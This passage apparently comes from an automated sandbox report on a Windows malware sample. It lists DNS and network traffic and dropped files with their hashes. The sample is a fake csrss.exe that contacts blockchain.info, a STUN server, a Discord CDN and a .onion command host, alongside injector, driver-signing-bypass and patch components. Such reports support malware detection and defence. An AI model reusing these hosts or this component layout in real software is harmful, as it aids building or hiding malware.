      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:54:15 GMT
    • flag-us
      DNS
      crl.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      crl.microsoft.com
      IN A
      Response
      crl.microsoft.com
      IN CNAME
      crl.www.ms.akadns.net
      crl.www.ms.akadns.net
      IN CNAME
      a1363.dscg.akamai.net
      a1363.dscg.akamai.net
      IN A
      2.19.252.157
      a1363.dscg.akamai.net
      IN A
      2.19.252.143
    • flag-gb
      GET
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      Remote address:
      2.19.252.157:80
      Request
      GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: crl.microsoft.com
      Response
      HTTP/1.1 200 OK
      Content-Length: 1036
      Content-Type: application/octet-stream
      Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
      Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
      ETag: 0x8DD1A40E476D877
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4de8ec0b-c01e-0047-3936-4c3cb1000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 25 Dec 2024 14:54:23 GMT
      Connection: keep-alive
    • flag-us
      DNS
      www.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      www.microsoft.com
      IN A
      Response
      www.microsoft.com
      IN CNAME
      www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net
      IN CNAME
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      IN CNAME
      e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net
      IN A
      184.25.193.234
    • flag-gb
      GET
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      Remote address:
      184.25.193.234:80
      Request
      GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: www.microsoft.com
      Response
      HTTP/1.1 200 OK
      Content-Length: 1078
      Content-Type: application/octet-stream
      Content-MD5: PjrtHAukbJio72s77Ag5mA==
      Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
      ETag: 0x8DCFA0366D6C4CA
      x-ms-request-id: ca00f663-501e-0037-2bf2-2b8546000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 25 Dec 2024 14:54:23 GMT
      Connection: keep-alive
      TLS_version: UNKNOWN
      ms-cv: CASMicrosoftCV80aab0ea.0
      ms-cv-esi: CASMicrosoftCV80aab0ea.0
      X-RTag: RT
    • flag-us
      DNS
      cdn.discordapp.com
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.discordapp.com
      IN A
      Response
      cdn.discordapp.com
      IN A
      162.159.129.233
      cdn.discordapp.com
      IN A
      162.159.130.233
      cdn.discordapp.com
      IN A
      162.159.135.233
      cdn.discordapp.com
      IN A
      162.159.133.233
      cdn.discordapp.com
      IN A
      162.159.134.233
    • flag-us
      DNS
      stun4.l.google.com
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      stun4.l.google.com
      IN A
      Response
      stun4.l.google.com
      IN A
      74.125.250.129
    • flag-us
      DNS
      blockchain.info
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      blockchain.info
      IN A
      Response
      blockchain.info
      IN A
      104.16.236.243
      blockchain.info
      IN A
      104.16.237.243
    • flag-us
      DNS
      server16.statscreate.org
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      server16.statscreate.org
      IN A
      Response
    • 204.79.197.219:443
      https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
      tls, http
      patch.exe
      2.9kB
      10.8kB
      18
      21

      HTTP Request

      GET https://msdl.microsoft.com/download/symbols/index2.txt

      HTTP Response

      404

      HTTP Request

      GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

      HTTP Response

      302

      HTTP Request

      GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

      HTTP Response

      302

      HTTP Request

      GET https://msdl.microsoft.com/download/symbols/index2.txt

      HTTP Response

      404

      HTTP Request

      GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

      HTTP Response

      302

      HTTP Request

      GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

      HTTP Response

      302
    • 20.150.70.36:443
      https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      tls, http
      patch.exe
      349.3kB
      18.1MB
      7306
      13001

      HTTP Request

      GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0

      HTTP Response

      200

      HTTP Request

      GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0

      HTTP Response

      200
    • 20.150.38.228:443
      https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      tls, http
      patch.exe
      27.8kB
      1.1MB
      530
      756

      HTTP Request

      GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59

      HTTP Response

      200

      HTTP Request

      GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59

      HTTP Response

      200
    • 2.19.252.157:80
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      http
      451 B
      1.7kB
      5
      5

      HTTP Request

      GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

      HTTP Response

      200
    • 184.25.193.234:80
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      http
      393 B
      1.7kB
      4
      4

      HTTP Request

      GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

      HTTP Response

      200
    • 127.0.0.1:31464
      csrss.exe
    • 162.159.129.233:443
      cdn.discordapp.com
      tls
      csrss.exe
      1.2kB
      5.4kB
      13
      15
    • 127.0.0.1:31464
      csrss.exe
    • 127.0.0.1:31464
      csrss.exe
    • 104.16.236.243:443
      blockchain.info
      tls
      csrss.exe
      1.3kB
      12.7kB
      15
      19
    • 8.8.8.8:53
      66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion
      dns
      csrss.exe
      150 B
      225 B
      1
      1

      DNS Request

      66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion

    • 8.8.8.8:53
      msdl.microsoft.com
      dns
      patch.exe
      64 B
      182 B
      1
      1

      DNS Request

      msdl.microsoft.com

      DNS Response

      204.79.197.219

    • 8.8.8.8:53
      vsblobprodscussu5shard30.blob.core.windows.net
      dns
      patch.exe
      92 B
      231 B
      1
      1

      DNS Request

      vsblobprodscussu5shard30.blob.core.windows.net

      DNS Response

      20.150.70.36
      20.150.79.68
      20.150.38.228

    • 8.8.8.8:53
      vsblobprodscussu5shard20.blob.core.windows.net
      dns
      patch.exe
      92 B
      231 B
      1
      1

      DNS Request

      vsblobprodscussu5shard20.blob.core.windows.net

      DNS Response

      20.150.38.228
      20.150.79.68
      20.150.70.36

    • 8.8.8.8:53
      crl.microsoft.com
      dns
      63 B
      162 B
      1
      1

      DNS Request

      crl.microsoft.com

      DNS Response

      2.19.252.157
      2.19.252.143

    • 8.8.8.8:53
      www.microsoft.com
      dns
      63 B
      230 B
      1
      1

      DNS Request

      www.microsoft.com

      DNS Response

      184.25.193.234

    • 8.8.8.8:53
      cdn.discordapp.com
      dns
      csrss.exe
      64 B
      144 B
      1
      1

      DNS Request

      cdn.discordapp.com

      DNS Response

      162.159.129.233
      162.159.130.233
      162.159.135.233
      162.159.133.233
      162.159.134.233

    • 8.8.8.8:53
      stun4.l.google.com
      dns
      csrss.exe
      64 B
      80 B
      1
      1

      DNS Request

      stun4.l.google.com

      DNS Response

      74.125.250.129

    • 74.125.250.129:19302
      stun4.l.google.com
      csrss.exe
      48 B
      60 B
      1
      1
    • 8.8.8.8:53
      blockchain.info
      dns
      csrss.exe
      61 B
      93 B
      1
      1

      DNS Request

      blockchain.info

      DNS Response

      104.16.236.243
      104.16.237.243

    • 8.8.8.8:53
      server16.statscreate.org
      dns
      csrss.exe
      70 B
      152 B
      1
      1

      DNS Request

      server16.statscreate.org

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

      Filesize

      8.3MB

      MD5

      fd2727132edd0b59fa33733daa11d9ef

      SHA1

      63e36198d90c4c2b9b09dd6786b82aba5f03d29a

      SHA256

      3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

      SHA512

      3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

    • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

      Filesize

      492KB

      MD5

      fafbf2197151d5ce947872a4b0bcbe16

      SHA1

      a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

      SHA256

      feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

      SHA512

      acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

      Filesize

      281KB

      MD5

      d98e33b66343e7c96158444127a117f6

      SHA1

      bb716c5509a2bf345c6c1152f6e3e1452d39d50d

      SHA256

      5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

      SHA512

      705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

    • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

      Filesize

      5.3MB

      MD5

      1afff8d5352aecef2ecd47ffa02d7f7d

      SHA1

      8b115b84efdb3a1b87f750d35822b2609e665bef

      SHA256

      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

      SHA512

      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

    • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

      Filesize

      94KB

      MD5

      d98e78fd57db58a11f880b45bb659767

      SHA1

      ab70c0d3bd9103c07632eeecee9f51d198ed0e76

      SHA256

      414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

      SHA512

      aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

      Filesize

      1.7MB

      MD5

      13aaafe14eb60d6a718230e82c671d57

      SHA1

      e039dd924d12f264521b8e689426fb7ca95a0a7b

      SHA256

      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

      SHA512

      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

    • \Users\Admin\AppData\Local\Temp\dbghelp.dll

      Filesize

      1.5MB

      MD5

      f0616fa8bc54ece07e3107057f74e4db

      SHA1

      b33995c4f9a004b7d806c4bb36040ee844781fca

      SHA256

      6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

      SHA512

      15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

    • \Users\Admin\AppData\Local\Temp\osloader.exe

      Filesize

      591KB

      MD5

      e2f68dc7fbd6e0bf031ca3809a739346

      SHA1

      9c35494898e65c8a62887f28e04c0359ab6f63f5

      SHA256

      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

      SHA512

      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

    • \Users\Admin\AppData\Local\Temp\symsrv.dll

      Filesize

      163KB

      MD5

      5c399d34d8dc01741269ff1f1aca7554

      SHA1

      e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

      SHA256

      e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

      SHA512

      8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

    • \Windows\rss\csrss.exe

      Filesize

      4.1MB

      MD5

      4347d1e8d835af022da5509bf3c17266

      SHA1

      4ab23c1a468cee9f4059559df3b4d05474076d2e

      SHA256

      d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38

      SHA512

      8ab13c820c36cb62f425a08a3f7af0d8c88a7aea86653a4c630fa031e00e7516e89f0374797c4249ee061e81fce382d904cc6a05c000ad8bb7d5136020d157d9

    • memory/1244-34-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

    • memory/1244-50-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

    • memory/2228-8-0x0000000000400000-0x0000000000C91000-memory.dmp

      Filesize

      8.6MB

    • memory/2228-1-0x0000000004B50000-0x0000000004F39000-memory.dmp

      Filesize

      3.9MB

    • memory/2228-0-0x0000000004B50000-0x0000000004F39000-memory.dmp

      Filesize

      3.9MB

    • memory/2228-4-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2228-2-0x0000000004F40000-0x00000000057B7000-memory.dmp

      Filesize

      8.5MB

    • memory/2228-6-0x0000000004B50000-0x0000000004F39000-memory.dmp

      Filesize

      3.9MB

    • memory/2228-7-0x0000000004F40000-0x00000000057B7000-memory.dmp

      Filesize

      8.5MB

    • memory/2228-3-0x0000000000400000-0x0000000000C91000-memory.dmp

      Filesize

      8.6MB

    • memory/2620-71-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-108-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-28-0x0000000004A10000-0x0000000004DF9000-memory.dmp

      Filesize

      3.9MB

    • memory/2620-66-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-111-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-110-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-101-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-102-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-103-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-104-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-105-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-106-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-107-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-70-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2620-109-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2672-29-0x0000000000400000-0x0000000003013000-memory.dmp

      Filesize

      44.1MB

    • memory/2672-5-0x0000000004B30000-0x0000000004F19000-memory.dmp

      Filesize

      3.9MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.